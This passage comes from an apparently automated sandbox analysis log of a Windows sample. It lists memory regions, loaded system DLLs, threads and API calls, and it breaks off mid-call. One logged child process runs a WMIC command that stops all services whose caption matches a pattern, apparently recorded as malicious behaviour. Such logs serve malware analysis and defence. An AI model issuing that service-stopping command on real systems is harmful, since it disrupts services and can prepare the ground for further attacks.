0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3081 start_va = 0x9b45860000 end_va = 0x9b4586ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b45860000" filename = "" Region: id = 3082 start_va = 0x9b45870000 end_va = 0x9b45876fff entry_point = 0x0 region_type = private name = "private_0x0000009b45870000" filename = "" Region: id = 3083 start_va = 0x9b458e0000 end_va = 0x9b4599dfff entry_point = 0x9b458e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3084 start_va = 0x9b459a0000 end_va = 0x9b459dffff entry_point = 0x0 region_type = private name = "private_0x0000009b459a0000" filename = "" Region: id = 3085 start_va = 0x9b459e0000 end_va = 0x9b459e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b459e0000" filename = "" Region: id = 3086 start_va = 0x9b459f0000 end_va = 0x9b459fffff entry_point = 0x0 region_type = private name = "private_0x0000009b459f0000" filename = "" Region: id = 3087 start_va = 0x9b45a00000 end_va = 0x9b45a06fff entry_point = 0x0 region_type = private name = "private_0x0000009b45a00000" filename = "" Region: id = 3088 start_va = 0x9b45a10000 end_va = 0x9b45a10fff entry_point = 0x0 region_type = private name = "private_0x0000009b45a10000" filename = "" Region: id = 3089 start_va = 0x9b45a20000 end_va = 0x9b45a20fff entry_point = 0x0 region_type = private name = "private_0x0000009b45a20000" filename = "" Region: id = 3090 start_va = 0x9b45b30000 end_va = 0x9b45cb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b45b30000" filename = "" Region: id = 3091 start_va = 0x9b45cc0000 end_va = 0x9b45e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b45cc0000" filename = "" Region: id = 3092 start_va = 0x9b45e50000 end_va = 0x9b4724ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b45e50000" filename = "" Region: id = 3093 start_va = 0x7ff6c40d0000 end_va = 0x7ff6c41cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40d0000" filename = "" Region: id = 3094 start_va = 0x7ff6c41fc000 end_va = 0x7ff6c41fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41fc000" filename = "" Region: id = 3095 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3096 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3097 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3098 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3099 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3100 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3101 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3102 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3103 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3104 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3105 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3106 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 226 os_tid = 0xe78 Thread: id = 227 os_tid = 0xe7c Thread: id = 228 os_tid = 0xe80 Process: id = "48" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x75de1000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xe6c" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3120 start_va = 0x2a0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3121 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3122 start_va = 0x2d0000 end_va = 0x2e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3123 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3124 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3125 start_va = 0x370000 end_va = 0x373fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 3126 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 3127 start_va = 0x390000 end_va = 0x391fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3128 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 3129 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3130 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3131 start_va = 0x7f800000 end_va = 0x7f822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Region: id = 3132 start_va = 0x7f82a000 end_va = 0x7f82cfff entry_point = 0x0 region_type = private name = "private_0x000000007f82a000" filename = "" Region: id = 3133 start_va = 0x7f82d000 end_va = 0x7f82dfff entry_point = 0x0 region_type = private name = "private_0x000000007f82d000" filename = "" Region: id = 3134 start_va = 0x7f82f000 end_va = 0x7f82ffff entry_point = 0x0 region_type = private name = "private_0x000000007f82f000" filename = "" Region: id = 3135 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3136 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3137 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3138 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3139 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3140 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3141 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3142 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3143 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3144 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3145 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3146 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3147 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3148 start_va = 0x3f0000 end_va = 0x4adfff entry_point = 0x3f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3149 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3150 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3151 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3152 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3153 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3154 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3155 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3156 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3157 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3158 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3159 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3160 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3161 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3162 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3163 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3164 start_va = 0x7f700000 end_va = 0x7f7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f700000" filename = "" Region: id = 3165 start_va = 0x7f827000 end_va = 0x7f829fff entry_point = 0x0 region_type = private name = "private_0x000000007f827000" filename = "" Region: id = 3166 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3167 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 3168 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3169 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 3170 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3171 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3172 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3173 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3174 start_va = 0x7d0000 end_va = 0xb06fff entry_point = 0x7d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3175 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3176 start_va = 0x690000 end_va = 0x778fff entry_point = 0x690000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3177 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3178 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 3179 start_va = 0x690000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3180 start_va = 0x510000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3181 start_va = 0x530000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3182 start_va = 0x690000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3183 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 3184 start_va = 0xb10000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 3185 start_va = 0xb10000 end_va = 0xbeefff entry_point = 0xb10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3186 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 3187 start_va = 0xc80000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 3188 start_va = 0x510000 end_va = 0x510fff entry_point = 0x510000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 3189 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3190 start_va = 0x530000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3191 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3192 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3193 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3194 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3195 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3196 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3197 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3198 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3199 start_va = 0x550000 end_va = 0x579fff entry_point = 0x550000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3200 start_va = 0x1080000 end_va = 0x1207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 3201 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3202 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3203 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x550000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3204 start_va = 0x5370000 end_va = 0x54f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 3205 start_va = 0x5500000 end_va = 0x68fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005500000" filename = "" Region: id = 3206 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3207 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3208 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3209 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3210 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3211 start_va = 0x6900000 end_va = 0x6a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 3212 start_va = 0x690000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3213 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3214 start_va = 0x1210000 end_va = 0x12c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 3215 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3216 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3217 start_va = 0x6900000 end_va = 0x69fffff entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 3218 start_va = 0x6a10000 end_va = 0x6a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 3219 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3220 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3221 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3222 start_va = 0x6e0000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3223 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3224 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3225 start_va = 0xc30000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3226 start_va = 0x6a20000 end_va = 0x6a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a20000" filename = "" Region: id = 3227 start_va = 0x7f6fa000 end_va = 0x7f6fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6fa000" filename = "" Region: id = 3228 start_va = 0x7f6fd000 end_va = 0x7f6fffff entry_point = 0x0 region_type = private name = "private_0x000000007f6fd000" filename = "" Region: id = 3229 start_va = 0x7f824000 end_va = 0x7f826fff entry_point = 0x0 region_type = private name = "private_0x000000007f824000" filename = "" Region: id = 3230 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3231 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3232 start_va = 0x720000 end_va = 0x734fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3233 start_va = 0x12d0000 end_va = 0x12f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Thread: id = 230 os_tid = 0xe8c [0112.563] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0112.563] __set_app_type (_Type=0x1) [0112.563] __p__fmode () returned 0x77ac4d6c [0112.563] __p__commode () returned 0x77ac5b1c [0112.563] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0112.563] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0112.564] ??0CHString@@QAE@XZ () returned 0x13495ec [0112.564] ??0CHString@@QAE@XZ () returned 0x13498fc [0112.564] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0112.564] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0112.564] _onexit (_Func=0x1340a20) returned 0x1340a20 [0112.564] _onexit (_Func=0x1340a30) returned 0x1340a30 [0112.564] _onexit (_Func=0x1340a50) returned 0x1340a50 [0112.564] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.564] ResolveDelayLoadedAPI () returned 0x770fcd50 [0112.565] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0112.566] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0112.571] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, 